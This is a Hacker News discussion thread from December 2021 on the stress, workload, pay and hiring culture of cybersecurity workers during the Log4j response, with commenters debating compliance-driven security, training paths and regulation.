Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Ask HN: Are Cybersecurity Workers Ok?
106 points by Victerius on Dec 14, 2021 | hide | past | favorite | 136 comments
In the last 12 months we have seen the SolarWinds hack, the Microsoft Exchange Server data breach, and since Friday, Log4j. I'm reading an article on CNN about the US government's response to Log4j.

"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet. Cybersecurity executives across government and industry are working around the clock on the issue."

""For most of the information technology world, there was no weekend," Rick Holland, chief information security officer at cybersecurity firm Digital Shadows, told CNN. "It was just another long set of days.""

The sysadmin subreddit is also full of professionals talking about the problem.

With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok? Have studies about the mental health and anxiety levels of this group of professionals been conducted?



The past few years have made me feel sour on how many organizations run cybersecurity in general. The industry is full of individuals who do not understand the tech they are protecting, and often they barely understand the security tech they use daily. A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude. They struggle with basic fundamentals like inventory and patch management. It is an industry that is hard to stay upbeat about if you are looking at anything larger than how it benefits your personal paycheck. If you want to get insight into the reality of how the government operates, just look at GAO reports, they are alarming: https://www.gao.gov/highrisk/ensuring-cybersecurity-nation


Add to that the general lack of education around cyber security, hardly any mainstream CS course teaches cyber security as a mandatory course. We have CS Phds engineers who are experts in their domains but struggle to understand basic security concepts. We need to educate engineers to care about security of their code and systems just like they care about performance, reliability, maintainability etc.

The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.

Look at recent Azure vulns, I am pretty sure their internal security team knew about these and after some back and forth some exec might have signed off an exception. They would rather be shipping features than fixing the mess they created. Most infosec peeps have trouble getting teams to prioritize of security stuff and some of the blame falls of infosec teams too for making everything sounds like a end of world scenario. But did Azure lose a single customer or did the stock price go down or loss of revenue? Nope, so whats the point of investing so much in security if it truly the only harm was some loss of reputation.

Even most security execs I have had a chance to interact with dont understand security topics properly, surely they can use some jargon to throw around in all-hands meetings and such. Unless from a security background these execs often confuse security with compliance and instead of investing in defense in depth techniques they look for check-boxes against security controls.


>Add to that the general lack of education around cyber security, hardly any mainstream CS course teaches cyber security as a mandatory course

Paradoxically, when someone has a pure (or at least focused) cybersec program (a few 3-4 year programs are taught by reputable institutions near me), and a Sec+ or equivalent, all of the old guard shout about needing years of experience (decades preferably) before you should be allowed to even think about security.

It only takes a few days in r/cybersecurity or r/securitycareeradvice to see these people in action, yelling at kids coming out of a 4-year university course focused on cybersec to "put in their dues" and work a call-center/help-desk for a few years resetting people's passwords before being allowed the honor of applying to an "entry-level" security position.

If a 4 year program cannot prepare you for an entry-level position, either the program is broken or the hiring expectations are broken.

Just in this thread someone was saying they would require 10 years of system administration AND 5 years of security experience before considering to hire them. In the same amount of time you can become a doctor or lawyer, and be operating on people or have established your own law firm.


I'm tempted to rather rudely suggest that the people who managed to get a job on a helpdesk without any qualifications and then worked their way up to an "old-school" bureaucratic security manager position might feel threatened by graduates with new fangled ideas about DevSecOps.


Exactly what counts as an entry level security position? Manually analyzing alerts or something?


Really, any cybersec role but with "Jr." in front; lightened duties and lightened responsibility, under the management of someone with more experience, doing whichever duties their manager thinks they can handle.

- Compliance auditing (PCI, ISO, WebTrust, etc.).

- Software auditing.

- Delivering basic consumer-level security awareness training.

- Tier 1/2 SOC and NOC duties.

- Member of an incidence response team.

- Member of a penetration testing team.

- Policy development, deployment and management.

- Jr. Researcher for XYZ (PKI, cryptography, authentication systems, malware, etc.)


> Add to that the general lack of education around cyber security

Part of the problem are the for-profit schools and bootcamps cranking out 'cyber security' graduates. They know the least out of all the people I interview. How can you pretend to know anything about cybersecurity when you don't actual know anything about programming or networking?

The classes cover buzzwords like vishing/phishing/smishing, you run Kali Linux and 'hack' something, and then you get your certificate.


>Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.

I got a lot of good mileage out of explaining the Equifax Struts vulnerability, which allowed attackers to move freely through Equifax internally once outer security was breached because internal security controls, especially around patching, were so weak. Might be worth trying if you encounter the same situation again.


> Most infosec peeps have trouble getting teams to prioritize of security stuff and some of the blame falls of infosec teams too for making everything sounds like a end of world scenario.

So much this. I had a security review failed because an API would respond with http 422 on invalid input. When I asked why that is a security issue I got shut down with “defense in depth”. After a longer discussion the problem was that 422 was not part of “the original http spec” but rather some ldap extension.


> Add to that the general lack of education around cyber security, hardly any mainstream CS course teaches cyber security as a mandatory course. We have CS Phds engineers who are experts in their domains but struggle to understand basic security concepts. We need to educate engineers to care about security of their code and systems just like they care about performance, reliability, maintainability etc.

Here's the issue: cyber security is seen as a cost center. As long as it's viewed a cost center good CS programs won't care for it. Which means right now it's relegated to certificates and extension schools... we all know what that means.

If companies/governments start caring for cybersecurity, ie, create a prestigious and visible organization that directly reports to the White House for instance, then you'll see the good CS degrees adding more of it to their curriculum.

> The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.

I remember being in a room like that. At one point several people were arguing and the lead engineer just tapped his brass rat on the table to get everyone's attention. I remember the PM was furious but what was he going to do? They don't sell those at the gift shop...

Truth is, PM orgs need to exist in a parallel way to engineering orgs. PMs managing engineers is a red flag, and a true tech company should ideally have engineers all the way to the CEO position. So if there's security work and engineering deems it necessary, it's done no matter what some non-technical employee thinks.

Engineers could honestly take a page from MDs here. Opinions of non-MDs are basically regarded as irrelevant...


Have you ever worked with someone in information security, only to find out they're checking off features but don't know what they're doing? Has it been scanned by this piece of software (which produces 832 fans positives) and provided a remediation plan? Has everyone taken the on-line cyber security training? Do you have a documented architecture? Are you using the approved software versions (only they didn't get the memo we've moved on from Java 1.8)?

I once had to argue back and forth with someone (circa 2008) that JavaScript did not mean "mobile code" in the sense of their checklist. I had to explain what JavaScript was, how it worked, but they were more than willing to tell me I had to remove it from the app I was working on. Which would have rendered my app and all the other apps for that client much less functional.


> JavaScript did not mean "mobile code" in the sense of their checklist

What the hell does that even mean?


What they were referring to were ActiveX controls, Java applets, dynamically downloaded JAR files like on Sun's Java browser, etc. Like rollerblading, it was the unfortunate trend of a bygone era. And yes, it was a ridiculous term. And just more evidence that the "cyber security" is just an organizational fig-leaf.


I think the general mindset is, if something can be used for exploitation, then for the sake of safety we should block it entirely.

Of course the mainstream stuffs are tolerated but anything outside of that would need a long list of approvals.


This. The only person I would trust is a person that was a sysadmin for at least 10 years and decided to specialize in security for another 5 years. So you are looking at minimum of 15 years experience to be decent. Without deep sysadmin skills - I am at a loss of what they would contribute. You are going to update our firewall without understanding what CIDR notation is? You are going to create a VPC for the dev environment not knowing what a subnet mask is? You are going to monitor security with thousands of VMs with no cloud background? Security is a specialized specialized field. Not only that you need to be a bit of a bully. You are always fighting PMs for more time to vet things and patch things - all while being a cost center.

Why do we have so many security disasters? Because those people are rare unicorns, ridiculously expensive, with no way to show added value.


If it takes 15 years to teach someone only to a decent level, the industry needs to start laying out plans for effective training and credentialing. The solution here is not higher years required, but more effective teaching. Learning on the job is practical, but not efficient, one example being you spend time dealing with org issues rather than learning something technical.

I don't agree that it takes 15 years though. I think you're setting the standards way too high for no good reason, especially for "decent".


> effective training and credentialing

By the time you're done creating the perfect "Information Security Certification" test everything will have changed. Even the most nebulous of security certifications (CISSP; which has a super generic test that doesn't cover much in the way of "practical security") still requires 5 years of experience before you can even take it.

It's just as bad as the JavaScript ecosystem. Maybe even worse, actually.

Information security is an ultra fast moving target. The only way for companies to effectively manage it is to hire people who constantly fuck around (with technology) and are always learning (the limits of) new things. It's incredibly hard to hire (and retain) people like that.

The "safest bet" for someone who really wants to be a great InfoSec professional is to get really good at Linux systems administration then start learning how to break into things. Because once you've broken into a system you need to know how to create/execute payloads. Otherwise you're going to get stuck on the first step every single time: Finding the vulnerability. You need to be able to exploit one host and then use that one to break into another system (pivot).

Learning Windows systems administration isn't as useful IMHO because there's fewer systems and they're all the same for the most part (monoculture). You can pick up everything you need to know about exploiting Windows in a short time and then exploit it limitlessly (haha) later. Whereas Linux sysadmin skills are applicable to a very wide array of systems from embedded stuff all the way to supercomputers.

Also, if you're going to get into hardware hacking or making physical devices that help you test the security of things Windows skills are basically useless. Nobody actually loads Windows 10/11 on to something like a Raspberry Pi in order to place a physical back door somewhere (or interface with SCADA systems, air conditioners, etc).


>By the time you're done creating the perfect "Information Security Certification" test everything will have changed.

>The only way for companies to effectively manage it is to hire people who constantly fuck around (with technology) and are always learning (the limits of) new things

Then make the curriculum about fucking around with technology, taught by people who fuck around with technology for a living. Then you get a nice certificate that says you fucked around with technology for a bit and showing that you're capable of fucking around with more technology.

You're right about all the previous certs, but the solution is simple: make the curriculum match how people actually learn in the industry.

>The "safest bet" for someone who really wants to be a great InfoSec professional is to get really good at Linux systems administration

Don't get really good: get pretty good then go learn programming. You talk about jumping between embedded and supercomputers later, but programming/AppSec is more important and way more useful (esp. if you don't already know how to program)

>Learning Windows systems administration isn't as useful IMHO because there's fewer systems

Oh no mate, AD is everywhere and those skills are immensely useful to a large amount of companies. Offensive Security even changed their OSCP exam to have an AD target set.


you are utterly missing a business dynamic here in America and elsewhere.. Companies that originate in, with strong-ties to, established finance, literally push skill down the pay stack, not up. What does that mean? If a certain engineering skill is rare, it will cost more money to pay someone, and harder to find. Therefore, commoditize and automate where you can, via cloud accounts and "best practices", outsource to another company where you can, and promote internally for ruthless cost-cutting, firing and aggressive contract manipulations. This is not extreme, this is normal and daily for decades.

The imaginary skilled professional you are describing clearly originates in the mind of an engineering worker.. a person gains skill through experience and is promoted. This is opposite of what management builds over time.. Management specifically and exactly destroys this career path because it costs them more money. As long as you can commoditize and outsource, you drive costs down, not up.

Meanwhile, it is "eternal September" in the job world, with streams of 20-somethings lining up to get into the markets. Add lower cost engineers, for example in Eastern Europe, South East Asia and South Asia. Rinse and repeat.


Thank you for this. This is the first post I've read on this thread that acknowledges the reality of what it's like for career-minded infosec folks.

I'm a 15-year infosec vet. I'm not nearly as technical as some of the HN crowd would like for infosec guys to be, in large part because high technical is not something employers generally want and are willing to pay for. If you want to maximize pay, the best path is to learn just enough to be regarded as competent, then move into management, sales, or PM work. There's barely room for the highly-skilled, highly-technical cyber guy in most large companies, let alone SMBs. Most companies chop this ideal infosec role into multiple parts too minimize cost and risk, just as you describe.


Agreed. And it's actually not an American phenomenon, but a global one (as long as it needs to be listed on US stock market). The model basically is to remove IT functionalities from branches and congregates all IT power (think DBA/DevOps/etc.) to HQ so that you only need to maintain one single big IT department. In the middle of this HQ will also try to replace custom solutions by one single solution that works for all branches/departments. The branches still need to maintain a small IT team but essentially they are just configuration pushers.

Then it outsources to Eastern Europe.


You could say the same about security folks without software engineering experience, too.

When I was working in infosec consulting, by far the best colleagues were those who had software engineering experience and could empathise with developers at the client in order to understand how systems would be built, where corners might be cut, which areas might be more ropey than others etc (and then use that understanding to help inform their thinking from an attacker's perspective).

You could tell at interview too - the folks with a Computer Science background and a side interest in security were much, much better than those who took the dedicated-cyber-security degree/masters route.

You absolutely need a real generalist for security. With that said, I don't think it's unreasonable to expect a developer to know about CIDR notation, networking and cloud systems though we're perhaps straying into more DevOps-y style roles.


This has been exactly my path. Can write data security guidelines and also read PCAP files fluently. However, you will not find very many of me.

Sysadmin/ops has too many offramps that drain talent before year 10. If you can integrate software/systems well, manage projects or do advanced troubleshooting; you will likely be pulled out of ops. Conversely there are an ocean of security certifications being issued to people who have very little operational/technical experience.

Data security in practice is being reduced to a policy and procedure checklist. It is frustrating for an engineering group to receive non-specific or contradictory policy guidelines written by non-technical people, but I have yet to see that change hiring or decision making. Businesses want someone who will agree to check the box. If that someone doesn't know all the details, that makes checking the box easier.

The future of cybersecurity is not skilled coordinator/PM but instead yet another non-technical management arm handing down mandates that are blind to technical reality. There isn't another option. There aren't enough people to fulfill demand, and the compensation for cybersecurity positions are often less than a senior infrastructure role. How many sysadmins really understand networking, programming, databases, etc; While also having the people skills to not alienate both management and highly technical development and operations teams? We will never have enough people at the intersection of that many skills.


I think the problem is sysadmin is NOT something you can learn using a personal account. Same for most DevOps things too, you simply don't have 1) the $$, and 2) the many services that you can play with. You HAVE to join a large corporation to learn the real stuff.

Plus nowadays more and more companies are going on cloud, so there are fewer sysadmins jobs anyway.

I'm someone who really wants to be in some admin jobs, be it DBA or sysadmin, problem is I first joined as a business analyst, and now I'm a DWH developer/Data engineer hybrid, every step towards a admin-ish job takes way too long and difficult for me :/


It's amazing that we can train someone to be a doctor and allow them to operate on your heart, brain, etc. within less time than you'd allow someone to touch your precious environment.

This points to two issues: education needs to be addressed with more input from industry, and expectations for hiring need to be realistic. 10 years before you're able to work on something security related is not realistic, nor is it sustainable.


I would not trust a surgeon to operate on me unless they have over 65 years of experience. I want them to have operated on patients since 'Nam. You went to a state medical school? Pfft. Go kill some other patient than me.

In all seriousness, your point brings up the idea of where does the responsibility for this immensely difficult task (securing networks) fall? If we could spread out the "required" 15 years of experience into each of the developers, would that have the same effect? Building software with security baked in would reduce the need for so much work after the fact.


General security awareness training in CS programs (not the 'don't get phished' type of security awareness) would certainly go a long way, in my opinion. Security being taught as a fundamental necessity of programming would, down the road, lessen the load everywhere else.

But there is also a fundamental disconnect between what schools are teaching and what industry is hiring for. The answer right now is "Go to school for cybersec, get your certs, then work for X years as a low-level help desk agent or call-center phone jockey".

Industry needs to tell educational institutions what candidates get from being a password-resetter that isn't taught in school, and work with those institutions to get those skills into the curriculum.

I have a lot more to say on the topic of cybersecurity and hiring, but I'm getting into rant territory.

Edit to add: You mentioned 'spreading out the 15 years of required experience'. I firmly do not believe it takes anywhere near 15 years of experience to become competent at cybersec.


Amusingly I would never hire a sysadmin to do security. Sysadmins were taught how to administer and apply this knowledge. With security the field is constantly shifting, you don’t want someone who knows how to apply you want someone with a deep understanding of the underlying principles able to design and explain new solutions. It’s really an engineer job.


Amusingly, this is a recent development.

Once upon a time there were programmers.

Then there were systems programmers and application programmers. Systems programmers wrote operating systems and utilities for them. App programmers wrote apps. There was a lot of crossover.

Then there were operators, systems programmers and application programmers. Operator was a junior position who did physical things (mount tapes, plug in cables) and ran commands to do things on the systems. They usually moved up to being…

Systems administrators, who did some programming in service to the systems, but not too much. The more senior a sysadmin was, the more time they spent programming and the less time they spent doing physical things… unless they wanted to do that.

Sysadmins started to specialize. People who configured switches and routers and talked to telephone companies became “network engineers”. People who spent time working on firewalls and security policies and thinking about that became “security engineers”. Junior people who read scripts to end users became the helpdesk. And so forth.

Then we noticed that a bunch of people were doing things manually when they should be automated. This was especially bad in places where there were no senior sysadmins or systems programmers. But we did have the internet, and senior sysadmins got together and started writing tools to make their lives easier: infrastructure automation.

Remind me, which kind of engineer?


That's very cute but that doesn't mirror my experience with reality at all. Sysadmins are people who are hired with specific knowledge regarding maintenance and management of the infrastructure. They are expected to have operational knowledge, are not asked to design novel solutions to unforseen problems and are paid accordingly. Most sysadmins I have worked with become unpleasant when they reach the limits of their expertise not curious. Good sysadmins tend to leave the field for better paid position in engineering or get hired as SRE by large companies which is aking to moving to an engineering position because SRE work like engineer.

The idea that senior sysadmins are behind the push towards automation is amusing. The biggest shift in the field in the past two decades came from Google when they decided to solve the tension between developers and sysadmins by more or less firing their sysadmins and hiring engineers to do the job instead.


> The idea that senior sysadmins are behind the push towards automation is amusing.

Many true things are amusing, including this one. I think you are operating with a remarkably narrow and historically ill-informed definition of "sysadmin", and your prophecies are self-fulfilling. If you have a tension between developers and sysadmins, it's a cultural problem.


Dang second thought, actually I kinda agree with you on the number of years though. Humans are strange animals that HAVE to learn from mistakes, and their OWN mistakes. Mistakes of other people rarely ring a bell loud enough.

But I do believe that for an entry level you don't need 15 years. Maybe 5 years of sysadmin or devops should be good enough.


Most jobs in "cybersecurity" are essentially just around for CYA purposes and not actually for improving security in any meaningful sense. Indeed, deployment of "security measures" for managerial CYA purposes result in things actively detrimental to security, like widely deployed, invasive snakeoil and many other things.


It's not just the jobs - it's the WHOLE fucking "software security" industry from the top down (I worked in it for 5 years - I refuse to touch it with a 20ft pole now).

The entire industry plays a game of:

- Create a checklist (or use an existing checklist - ex: FIPS)

- Check off all the boxes on the checklist (any way they can - however they can, with complete and utter disregard for the spirit of the checklist)

- Confirm with legal that checklist is complete

- Advertise that they are "secure" to customers who happen to care (not many do, honestly) and present them with the required completed checklists

- Get hacked LEFT AND RIGHT because the whole fucking game has nothing to do with security, and everything to do with liability.

- When they're hacked, whip out the checklist again and go "couldn't have been our fault! we followed the checklist."

Repeat.

----

Now - Software security is hard. Unfathomably hard to most people (as in - they literally don't understand). People STILL fail to realize that software security is not like building a bride - I see it still even here on HN, where folks spout off bullshit comparisons to things like restaurant health/safety inspections, or architectural reviews.

The difference is that the bridge is not constantly being assaulted by an intelligent, evolving, malicious, human force. The software usually is.

And the security team can't just win one battle - they have to win every battle. Whether that's old systems, or a tired employee clicking an email link.

So I think you're basically between a rock and a hard place as an honest security worker. The job is literally impossible - so the folks who make money are the ones who compromise fastest and check off the most checklists (again - spirit of the checklist be damned).

I think the ballooning insurance payments (and the obvious eventual halt to offering cybersecurity insurance) will eventually bring the whole house of cards down, but we're still a few years out from that.


Physical world analogies are appealing and easy to visualize but they work so poorly that I wish we stopped using them altogether for IT security. A bridge under attack is a bad analogy too. One cannot possibly build a bridge which is impossible to destroy having budget 100x of bridge building. But in IT at least in theory it is possible to build such system. If you make no mistakes. But the more complex system the less likely that no stupid mistakes where made.


Those comparisons are a pet peave of mine. What kind of bridge can you automatically tear down and rebuild from a blueprint? Or be reliably built on top of layers of technology you barely understand. That does create moral hazard. But it can also be a solution.


In light of this, how would you propose a developer or a would-be developer to really understand software security? I have the feeling that unless one is well versed in sys-prog concepts it's kinda just a checklist factory. I know I need to do A, B and C but I don't know in depth why.


That's because having good security doesn't make you more money.


Now that insurance companies are aware of all those infamous exploitation stories that make headlines...

Well, maybe more checklists and consultants.


"A penny saved is a penny earned."

It may not make more revenue but poor security certainly affects profits.


As long as poor security is cheaper than effective security, nothing changes. Equifax, Solarwinds, and Colonial Pipeline are all still in business.


This. We really need more competitions to help.


Competition won't help - it is impossible for an outsider to accurately measure a company's security practices and pick a company based on that.

What we need is regulation regarding putting personal data at risk to provide a financial incentive for companies to take security seriously.


That is the last thing business wants. The credit card brands developed PCI to avoid regulation. But in most circumstances, there is no 800 pound gorilla to enforce security standards.

If you do an in-depth read of the PCI security standards, you’ll see that the standards are about protecting the card brands, not you.


PCI is a very bad example because when it comes to card fraud the liability is on the merchant, bank or card networks. So in that sense it's actually normal that PCI focuses on protecting card brands and not you because you are already protected by them and they're just trying to recoup the costs.


You can't compete against free.

Risk is free.

A risk-aware competitor faces a higher cost function and a market which won't support it.

What we need is regulation, and direct liability of corporations, stockholders, creditors, and executives.


Change doesn't only occur with death.


The funny thing about this adage is any profitable endeavor will have higher revenue gains so as stated it fails to convince.

"A stitch in time saves nine" is probably more relevant to security.


Accountants have made loss-risk-based evaluations for a few centuries now.


Neither does GDPR compliance but here in EU I know some companies who're real nervous of being fined, while at the same time doing their best to comply.

Fines would therefore be the obvious solution to the lack of cybersecurity. Network breach / data leak due to not patching software x days after vuln disclosure? Here's your fine!


Unfortunately, most of the alphabet soup compliance programs have perverse incentives - they encourage ticking check-boxes, while do nothing to improve the security as such.

I believe the real problem is effective security is hard, and most merely want to pretend than actually invest in doing it.


I had our sec team try and blanket ban base64 strings on our WAF in response to log4shell. I'm talking body, url everything.

The reasoning was we probably don't use base64. I was amazed.


I love that if you brought up that you can’t tell the difference between base64 encoding in URLs and other random alphanumeric strings, your cyber team would then get even more wide-eyed about “ex filtration attacks”.


Please ask them to write a regex that filters out those naughty base64 strings! Yes, "12345678" is a valid base64 string and so is "clueless".


> A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude.

Why would they? Does capitalism incentivise "caring" on a technical and ethical level about doing the right thing, or does it incentivise spending the minimum amount of resources to be covered by insurance and not criminally liable for anything? If they did the "right thing", someone in management is wasting resources.

Of course, if your company is private and the shareholders are decent enough people to make sure the board are doing things properly, this can work. With public companies I don't see how it is remotely feasible?

We have to legislate to compel companies to do this and expand the definition of negligence, which itself is quite complex. Make the people at the very highest levels criminally liable for breaches that happen due to lax, box checking behaviour on their watch. It is the only way.


You really have to have a zen mindset and refuse to let these outside issues control you. There is infinite bad shit out there and you can work for years and barely make a dent in it. That is just how it is.

Personally, I am helped by being a client server. It constantly amazes me the kind of risk a business is willing to accept for barely anything in return, and if I actually had a personal stake in what I am seeing at clients I think I would be much more stressed.

Also, the issue is not just 'are security professionals ok'. Good security starts with good operations, and good operations is a rarity. We need devs to ship products that can run with least privileges and have secure defaults. We need operators to have a good understanding of their own environment and to design things on purpose rather than just improvising. We need security people that can offer more guidance than just printing out a nessus scan. We need business analysts who are pragmatic with concessions and who are willing to spend the resources needed to do things right the first time.


I think a big issue from what people are saying is that somehow it has become an infosec's employee's fault that the system is not secure. This is about managing boundaries and happens in many disciplines. My wife struggles as a Solicitor with unending demands on her time and the guilt-trips of "This agreement needs to be done on Friday" and for some reason, people get upset if the response is, "you should have given me 4 weeks notice".

The landscape is desperate with hundreds of apps, servers, networks, employees etc. in most companies. The tooling is either difficult or expensive or both - how many people allow outgoing firewall traffic by default because it is too complicated to whitelist everything that needs to go out? Even with the best will in the world, basic things like Windows updates, SSL cert updates (no we can't all use Lets Encrypt), Linux updates can be a full-time role.

But to be fair, our industry is still quite immature. We do not have the regulatory backup across the globe to assure all products are developed securely etc. We use open-source libraries with barely any checks (and what would we check anyway?) and IT is mostly intangible so how do we even know what we are doing anyway?

This sounds doom and gloom but I think every industry has a Wild West stage that teaches people what is and isn't important and allows industries and products to mature eventually to something that is sustainable.


> "somehow it has become an infosec's employee's fault that the system is not secure."

Yet, it still isn't; elsewhere someone mentioned doctors and by comparison a doctor must pass nationally recognised exams and afterwards take personal responsibility for what they do every day, hold malpractise insurance and risk being struck off medical registers and forbidden from practising again for e.g. incompetence, unethical behaviour, malpractise. What are the equivalent of these in cybersecurity?

Customers or users whose data is stolen in a hack, employees who lost their jobs to a ransomware attack shutting down a company, what equivalent of "medical malpractise" lawsuits can they bring against the infosec team that was employed and paid to keep them safe? Can it even be determined by the harmed people whether the infosec team acted unethically or incompetently vs. sensibly? What reassurance can they take when the infosec employee says "I told them I shouldn't be opening this connection and they made me, so it's not my fault"? Imagine a surgeon performing a surgery they disagree with on a patient because non-medically qualified hospital management told them to. What happens to the security teams who incompetently don't protect against those harms and they carry on to their next job without any obligation to disclose their association? What board of reasonably trusted people is overseeing them, holding them to account, what register can they be struck off? It's "mistakes were made" all the way up to the CEO.

I don't agree that it's the infosec employee's fault. (Insert popular civil engineering/bridge design comparison here, and the need for a competent qualified senior engineer to sign their name against a design which they can personally be held responsible for).


No we’re not. I will tell you this year I’ve dealt with more security incidents than I have in my entire career combined.

My organization takes security seriously but and the end of the day we serve customers who don’t. That’s been the bulk of our issues this year.

log4shell has just been the icing on the cake.


Are you at least getting paid better?


Nope, not being paid better here despite the 'need for talent', record profits and inflation. "Lucky" to get a 2.5% raise. YES yes I know the rhetoric, " just find a better job". No, not doing better; this year has seen more incidents for my team than ever before. Still operating on a shoestring budget, lacking in tools and coverage, and more and more piled on the plate. Things are not okay.


> YES yes I know the rhetoric, " just find a better job".

That's the rhetoric from young people with no strings attached. People who are older, often with families, always with local connections and long-term relationships, have far more variables when it comes to making that sort of decision.

Pay and working environment (unless either are truly terrible) are rarely even at the top when it comes to enumerating the factors that go into deciding to stay or uproot your entire life and start again elsewhere. If you have a spouse with a good job in a niche area, doubly difficult.

EDIT: Unless you live in an area where you have many nearby options, of course. But those sorts of areas are sometimes harder to move around because the competition for 'good' employers is much fiercer.


FWIW, 2021 has been probably the best year ever to change the company in IT:

- Remote work is now standard, you don't have to relocate

- US companies and well-funded startups opening up outside of US and hiring remote devs (though this is not always officially advertised, but for senior-enough people it's almost always negotiable)

- Tons of reports of people getting 30/50/100% raises (by changing jobs, or counter-offers)

Source: first-hand on all above (I'm frontend dev though, not in security)


I have a family, local connections, etc. In the past year I've changed jobs twice, for a 45% raise in the last 12 months. But because all three jobs over this period have been remote, I haven't had to disrupt my family at all.

Since the last two companies have been headquartered in different cities, this wouldn't have been possible before COVID.

The silver lining on this damned pandemic has been a lot more options for people, like software developers, in the privileged position of being in demand with work that can be done remotely.


And factor in ageism. I'm about a decade away from retirement, but I definitely don't want to be job hopping. The idea of interviewing at my age is horrifying.


I would suspect not, unless they left and went to another company.


As a cybersecurity person, what do you do about log4j?

1. Try to identify if you are vulnerable

2. Inform people in your company

3. Contact vendors of vulnerable products and ask for a patch

4. Have sysadmins install said patch

Cybersecurity people don't do anything. You're not patching. You're not finding the new flaws. You're reactively trying to solve problems when they make the news.


This reductionist logic can be applied to anything (i.e. is meaningless).

This is actually a bit of a fun exercise!

What do programmers even do?

1. Client tells them what they want solved.

2. Stack overflow has code examples for these problems.

3. IDE tells you what will compile, what wont, even highlights stuff for you (programmer just copy/pastes).

4. Compiler makes the program, and warns you if it doesn't work. If it doesn't work, go back to step 2.

Programmers don't do anything.

See how dumb that sounds when you skip over a bunch of the minutiae? Or when only looking at a single event? Or generalize to the point of nothingness?


Hell yeah I’m doing fuckin great. I make almost double what I did two years ago and I’m receiving 20+ job solicitations per week. I believe the ever escalating rate of hacks has dramatically improved the job market from the employees perspective.

Cybersecurity is SUPER broad though and there’s a range of many different roles. I’m a bit surprised all the folks here saying they’re not okay. Best of luck to them and maybe it’s time for a role swap.

I used to work in a SOC so I get it and probably would be struggling if I was still there.


What are your working hours like?

Also somewhat related - what's the best path for a senior software developer to enter that space? Is the pay the same?


I pretty much work whenever I like, except for the 1-2 daily meetings I have during normal business hours.

> what's the best path for a senior software developer to enter that space? Is the pay the same?

Well it depends what you’d wanna do. I work in application security which imo is the easiest transition into security for a senior dev.

Security experts who possess a strong programming background are quite rare. It’s been a huge advantage for me personally.

The most straightforward way into appsec might be to get your oscp. People will take you seriously if you’re a senior dev and have that cert. I hear it’s a beast but it can be done with a few months of serious effort.

As for pay, It’s hard to tell cause devs have a wide range. I make ~170k and live in Atlanta for reference after 4 yrs experience.

The roles that come my way are between 150k-225k. Obviously if you can land a FAANG role the compensation can be much greater.


> I make ~170k and live in Atlanta for reference after 4 yrs experience.

Holy cow, that's much better than I figured. I make that much and I have 15 years of dev experience. I live near Portland, OR and work for a company based in LA. Portland's cost of living is much higher than Atlanta too so you're doing really well.

My work-life balance is excellent, so that was really my main concern, but sounds like yours is just about equal if not better. Thanks for your response, I think I'll have to seriously consider a transition now.


What do you do now?


I’m an AppSec engineer and the bulk of my work is application pentesting/security assessments.

Even within appsec the roles can vary quite a bit…some folks just do sdlc security for example.


I'm not a worker but it sounds similar to the Mad Gadget remote code exec bug in Apache Commons Collections that was discovered five years ago. I wrote a blog post about it. https://opensource.googleblog.com/2017/03/operation-rosehub.... Back when I worked at Google, we sent pull requests to about 2,600 open source projects. The thought never really crossed our minds to blog about it publicly. The problem is that people just kept getting hacked, because these Java core libraries are everywhere. Looking back to Mad Gadget should give us some idea of what to expect. I can't tell for certain but this Log4j RCE could be worse since Apache says it can be triggered not just by the format string but also by the log parameters. However I'm not sure what they mean by LDAP since I wouldn't have thought that'd intersect with a logging library. https://logging.apache.org/log4j/2.x/security.html


I gave up on continuing into cybersecurity, after just first experiences several years ago, I keep up with people though (Out of the 15 I knew 4 have quit, one even going to do construction work, 2 commited suicide). I now consider it the IT janitorial department basically with the budget and control the department gets the only thing you get to do is fling feces on the wall (An analogy for the reports for things that need fix but never get down because (Pick ONE)):

1. Not Budgeted for.. 2. To Much Down time (Excuse on systems even, that are fully load balanced).. 3.. WHHHHHHNNN But we need that legacy system (Which is real, because if it goes down the whole network does)... 4. This doesn't sound critical, let's bring this up next year. 5. Because I (Non-techy boss man) said we're not going to do it. As a matter of fact I am going to sue: HIPPPA, OR PCI, OR Some Reg agency for governmental overreach of a proper business.


Log4j vulnerability became big news Friday evening. I did not have a weekend. Monday I went to bed at 3AM (technically Tuesday) and I was up at 8. It’s midnight and I am not yet done for the day.

Am I okay?


You might not be. Make sure you take some time off after this. You deserve it.


Hopefully you are hourly at least and make up with sweet overtime. I apologize deeply if you are salaried.


Take rest! There will be another one of these and more work to be done in future.


Thank you for your service.


It happens once in a while.


I think it depends on your job. As someone working I operations I contantly feel that business and developers are pushing solution far beyond what can safely supported. With stuff like Docker, Kubernetes and DevOps, developers have failed to understand that much of the security responsibility have shifted from Ops to Dev. Did I patch the OS? Yes, of cause. Did you update your container in the last few months? If not, then why the F… does it matter if I patched the OS?

On the other hand my colleguaes who look for hackers, do forensics and help customer who are/have been attacked are having the time of their life. Rarely do you see people as excited about their works as these guys during this weekend.


I work for one of the OS makers and we have been making a concerted effort to get rid of memory safety issues across the codebase. I'm not sure if the open-source side of things are attempting similar efforts but as far as consumer OS's I have seen a lot of improvement over the last 10 years.

I feel bad for anyone working in an org that doesn't have the ability to proactively find bugs in their stuff. Lots of places are cheap and don't account for the debt they accrue by not updating their systems. 'if it aint broke don't fix it' doesn't apply to software. What you are shipping is always broken. 'safe' languages are written in unsafe languages. The interpreter has bugs, the vm has bugs, the virtualization stack has bugs, the OS has bugs, the libraries to do everything have bugs. What is there and what is known are both moving targets. If you are not hiring the offensive minded individuals who will find the bugs with or without your support then you will not know about the bugs until they are out in the wild. If you aren't willing to pay those people you are accruing debt that will come due later.


No, No we are not.

There has been serious underspending by companies for cybersecurity for at least a decade now. Companies are slowly waking up to the fact that the security team can't be less than 1% the size of the development team.

